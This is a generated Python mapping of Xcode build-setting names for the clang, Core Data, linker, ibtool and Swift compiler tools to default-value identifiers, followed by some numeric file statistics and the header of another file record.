"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNKNOWN_PRAGMAS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNKNOWN_PRAGMAS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_FUNCTION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_FUNCTION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_LABEL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_LABEL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_PARAMETER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_PARAMETER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VALUE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VALUE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VARIABLE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VARIABLE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__HEADERMAP_FILE_FORMAT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__HEADERMAP_FILE_FORMAT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_LTO__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_LTO__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_0__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_0__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_1__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_1__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_2__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_2__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_3__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_3__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_fast__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_fast__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_s__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_s__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_z__DefaultValue": _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_z__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__USE_HEADERMAP__DefaultValue": _com_apple_compilers_llvm_clang_1_0__USE_HEADERMAP__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__USE_HEADER_SYMLINKS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__USE_HEADER_SYMLINKS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__WARNING_CFLAGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__WARNING_CFLAGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__arch__Condition": _com_apple_compilers_llvm_clang_1_0__arch__Condition,
"com_apple_compilers_llvm_clang_1_0__diagnostic_message_length__DefaultValue": _com_apple_compilers_llvm_clang_1_0__diagnostic_message_length__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__print_note_include_stack__DefaultValue": _com_apple_compilers_llvm_clang_1_0__print_note_include_stack__DefaultValue,
"com_apple_compilers_model_coredata__DEPLOYMENT_TARGET__DefaultValue": _com_apple_compilers_model_coredata__DEPLOYMENT_TARGET__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_MODULE__DefaultValue": _com_apple_compilers_model_coredata__MOMC_MODULE__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_DELETE_RULE_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_DELETE_RULE_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_INVERSE_RELATIONSHIP_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_INVERSE_RELATIONSHIP_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_MAX_PROPERTY_COUNT_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_MAX_PROPERTY_COUNT_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_NO_WARNINGS__DefaultValue": _com_apple_compilers_model_coredata__MOMC_NO_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__DefaultValue": _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodel__DefaultValue": _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodel__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodeld__DefaultValue": _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodeld__DefaultValue,
"com_apple_compilers_model_coredata__MOMC_SUPPRESS_INVERSE_TRANSIENT_ERROR__DefaultValue": _com_apple_compilers_model_coredata__MOMC_SUPPRESS_INVERSE_TRANSIENT_ERROR__DefaultValue,
"com_apple_compilers_model_coredata__build_file_compiler_flags__DefaultValue": _com_apple_compilers_model_coredata__build_file_compiler_flags__DefaultValue,
"com_apple_compilers_model_coredatamapping__DEPLOYMENT_TARGET__DefaultValue": _com_apple_compilers_model_coredatamapping__DEPLOYMENT_TARGET__DefaultValue,
"com_apple_compilers_model_coredatamapping__MAPC_MODULE__DefaultValue": _com_apple_compilers_model_coredatamapping__MAPC_MODULE__DefaultValue,
"com_apple_compilers_model_coredatamapping__MAPC_NO_WARNINGS__DefaultValue": _com_apple_compilers_model_coredatamapping__MAPC_NO_WARNINGS__DefaultValue,
"com_apple_compilers_model_coredatamapping__build_file_compiler_flags__DefaultValue": _com_apple_compilers_model_coredatamapping__build_file_compiler_flags__DefaultValue,
"com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__Condition": _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__Condition,
"com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__DefaultValue": _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__DefaultValue,
"com_apple_pbx_linkers_ld__BUNDLE_LOADER__DefaultValue": _com_apple_pbx_linkers_ld__BUNDLE_LOADER__DefaultValue,
"com_apple_pbx_linkers_ld__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue": _com_apple_pbx_linkers_ld__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue,
"com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__Condition": _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__Condition,
"com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__DefaultValue": _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__DefaultValue,
"com_apple_pbx_linkers_ld__EXPORTED_SYMBOLS_FILE__Condition": _com_apple_pbx_linkers_ld__EXPORTED_SYMBOLS_FILE__Condition,
"com_apple_pbx_linkers_ld__GENERATE_PROFILING_CODE__Condition": _com_apple_pbx_linkers_ld__GENERATE_PROFILING_CODE__Condition,
"com_apple_pbx_linkers_ld__KEEP_PRIVATE_EXTERNS__DefaultValue": _com_apple_pbx_linkers_ld__KEEP_PRIVATE_EXTERNS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__Condition": _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__Condition,
"com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__DefaultValue": _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__Condition": _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__Condition,
"com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__DefaultValue": _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DEPENDENCY_INFO_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_DEPENDENCY_INFO_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__Condition": _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__Condition,
"com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__DefaultValue": _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__Condition": _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__Condition,
"com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__DefaultValue": _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DYLIB_ALLOWABLE_CLIENTS__DefaultValue": _com_apple_pbx_linkers_ld__LD_DYLIB_ALLOWABLE_CLIENTS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__Condition": _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__Condition,
"com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__DefaultValue": _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__DefaultValue,
"com_apple_pbx_linkers_ld__LD_EXPORT_GLOBAL_SYMBOLS__DefaultValue": _com_apple_pbx_linkers_ld__LD_EXPORT_GLOBAL_SYMBOLS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__Condition": _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__Condition,
"com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__Condition": _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__Condition,
"com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__DefaultValue": _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__DefaultValue,
"com_apple_pbx_linkers_ld__LD_GENERATE_MAP_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_GENERATE_MAP_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__Condition": _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__Condition,
"com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__DefaultValue": _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__Condition": _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__Condition,
"com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__DefaultValue": _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_MAP_FILE_PATH__DefaultValue": _com_apple_pbx_linkers_ld__LD_MAP_FILE_PATH__DefaultValue,
"com_apple_pbx_linkers_ld__LD_NO_PIE__DefaultValue": _com_apple_pbx_linkers_ld__LD_NO_PIE__DefaultValue,
"com_apple_pbx_linkers_ld__LD_OBJC_ABI_VERSION__DefaultValue": _com_apple_pbx_linkers_ld__LD_OBJC_ABI_VERSION__DefaultValue,
"com_apple_pbx_linkers_ld__LD_QUOTE_LINKER_ARGUMENTS_FOR_COMPILER_DRIVER__DefaultValue": _com_apple_pbx_linkers_ld__LD_QUOTE_LINKER_ARGUMENTS_FOR_COMPILER_DRIVER__DefaultValue,
"com_apple_pbx_linkers_ld__LD_RUNPATH_SEARCH_PATHS__DefaultValue": _com_apple_pbx_linkers_ld__LD_RUNPATH_SEARCH_PATHS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__Condition": _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__Condition,
"com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__DefaultValue": _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__DefaultValue,
"com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_VARIANTS__Condition": _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_VARIANTS__Condition,
"com_apple_pbx_linkers_ld__LD_THREAD_SANITIZER__DefaultValue": _com_apple_pbx_linkers_ld__LD_THREAD_SANITIZER__DefaultValue,
"com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__Condition": _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__Condition,
"com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__DefaultValue": _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__DefaultValue,
"com_apple_pbx_linkers_ld__LINKER_DISPLAYS_MANGLED_NAMES__DefaultValue": _com_apple_pbx_linkers_ld__LINKER_DISPLAYS_MANGLED_NAMES__DefaultValue,
"com_apple_pbx_linkers_ld__LINK_WITH_STANDARD_LIBRARIES__DefaultValue": _com_apple_pbx_linkers_ld__LINK_WITH_STANDARD_LIBRARIES__DefaultValue,
"com_apple_pbx_linkers_ld__ORDER_FILE__DefaultValue": _com_apple_pbx_linkers_ld__ORDER_FILE__DefaultValue,
"com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__Condition": _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__Condition,
"com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__DefaultValue": _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__DefaultValue,
"com_apple_pbx_linkers_ld__PRESERVE_DEAD_CODE_INITS_AND_TERMS__DefaultValue": _com_apple_pbx_linkers_ld__PRESERVE_DEAD_CODE_INITS_AND_TERMS__DefaultValue,
"com_apple_pbx_linkers_ld__UNEXPORTED_SYMBOLS_FILE__Condition": _com_apple_pbx_linkers_ld__UNEXPORTED_SYMBOLS_FILE__Condition,
"com_apple_pbx_linkers_ld____INPUT_FILE_LIST_PATH____DefaultValue": _com_apple_pbx_linkers_ld____INPUT_FILE_LIST_PATH____DefaultValue,
"com_apple_pbx_linkers_ld__arch__Condition": _com_apple_pbx_linkers_ld__arch__Condition,
"com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_AUTO_ACTIVATE_CUSTOM_FONTS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_AUTO_ACTIVATE_CUSTOM_FONTS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_USE_NIBARCHIVES_FOR_MACOS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_USE_NIBARCHIVES_FOR_MACOS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_ERRORS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_ERRORS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_FLATTEN_NIBS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_FLATTEN_NIBS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_MODULE__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_MODULE__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_NOTICES__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_NOTICES__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_OTHER_FLAGS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_OTHER_FLAGS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_PLUGINS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGINS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_PLUGIN_SEARCH_PATHS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGIN_SEARCH_PATHS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_REGIONS_AND_STRINGS_FILES__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_REGIONS_AND_STRINGS_FILES__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__IBC_WARNINGS__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__IBC_WARNINGS__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__XIB_COMPILER_INFOPLIST_CONTENT_FILE__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__XIB_COMPILER_INFOPLIST_CONTENT_FILE__DefaultValue,
"com_apple_xcode_tools_ibtool_compiler__build_file_compiler_flags__DefaultValue": _com_apple_xcode_tools_ibtool_compiler__build_file_compiler_flags__DefaultValue,
"com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue": _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING__DefaultValue": _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_CROSS_MODULE_OPTIMIZATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_CROSS_MODULE_OPTIMIZATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_DEPLOYMENT_TARGET__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_DEPLOYMENT_TARGET__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_DISABLE_SAFETY_CHECKS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_DISABLE_SAFETY_CHECKS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_EMIT_MODULE_INTERFACE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_EMIT_MODULE_INTERFACE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_APP_EXTENSION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_APP_EXTENSION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_INCREMENTAL_COMPILATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_INCREMENTAL_COMPILATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_LIBRARY_EVOLUTION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_LIBRARY_EVOLUTION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_TESTABILITY__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_TESTABILITY__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_ENFORCE_EXCLUSIVE_ACCESS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_ENFORCE_EXCLUSIVE_ACCESS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_EXEC__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_EXEC__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__Condition": _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__Condition,
"com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_PATH__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_PATH__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_INSTALL_OBJC_HEADER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_INSTALL_OBJC_HEADER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARIES_ONLY__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARIES_ONLY__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARY_PATH__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARY_PATH__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_LINK_OBJC_RUNTIME__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_LINK_OBJC_RUNTIME__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_MODULE_NAME__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_MODULE_NAME__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_BRIDGING_HEADER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_BRIDGING_HEADER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_INTERFACE_HEADER_NAME__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_INTERFACE_HEADER_NAME__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_OPTIMIZATION_LEVEL__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_OPTIMIZATION_LEVEL__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_PRECOMPILE_BRIDGING_HEADER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_PRECOMPILE_BRIDGING_HEADER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_REFLECTION_METADATA_LEVEL__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_REFLECTION_METADATA_LEVEL__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_RESPONSE_FILE_PATH__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_RESPONSE_FILE_PATH__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_SERIALIZE_DEBUGGING_OPTIONS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_SERIALIZE_DEBUGGING_OPTIONS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_STDLIB__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_STDLIB__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_SUPPRESS_WARNINGS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_SUPPRESS_WARNINGS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_SWIFT3_OBJC_INFERENCE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_SWIFT3_OBJC_INFERENCE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_TARGET_TRIPLE__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_TARGET_TRIPLE__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_THREAD_SANITIZER__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_THREAD_SANITIZER__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_TREAT_WARNINGS_AS_ERRORS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_TREAT_WARNINGS_AS_ERRORS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WHOLE_MODULE_OPTIMIZATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WHOLE_MODULE_OPTIMIZATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WMO_TARGETS__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WMO_TARGETS__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_VERSION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_VERSION__DefaultValue,
"com_apple_xcode_tools_swift_compiler__SWIFT_WHOLE_MODULE_OPTIMIZATION__DefaultValue": _com_apple_xcode_tools_swift_compiler__SWIFT_WHOLE_MODULE_OPTIMIZATION__DefaultValue,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__Condition": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__Condition,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__DefaultValue": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__DefaultValue,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__Condition": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__Condition,
"com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__DefaultValue": _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__DefaultValue,
}
| 50.181189 | 306 | 0.796303 | 31,954 | 217,686 | 4.676472 | 0.017024 | 0.06071 | 0.123769 | 0.097389 | 0.981838 | 0.977575 | 0.97346 | 0.971372 | 0.965115 | 0.960437 | 0 | 0.020509 | 0.144575 | 217,686 | 4,337 | 307 | 50.19276 | 0.781966 | 0.031743 | 0 | 0.724454 | 0 | 0.000316 | 0.180726 | 0.147567 | 0 | 0 | 0 | 0 | 0.000633 | 1 | 0.113888 | false | 0 | 0 | 0.073078 | 0.227776 | 0.000633 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3423c1a4eb08c5636ac3a45f7a7642f0fb74d9e6 | 5,533 | py | Python | Implementacion/cross_calc.py | TheReverseWasp/TIA-Lab-Regresion_Logistica | 82d161c78bbf078b49f4ab583b371153be7eaf21 | [
"MIT"
] | null | null | null | Implementacion/cross_calc.py | TheReverseWasp/TIA-Lab-Regresion_Logistica | 82d161c78bbf078b49f4ab583b371153be7eaf21 | [
"MIT"
] | null | null | null | Implementacion/cross_calc.py | TheReverseWasp/TIA-Lab-Regresion_Logistica | 82d161c78bbf078b49f4ab583b371153be7eaf21 | [
"MIT"
] | null | null | null | tr = {}
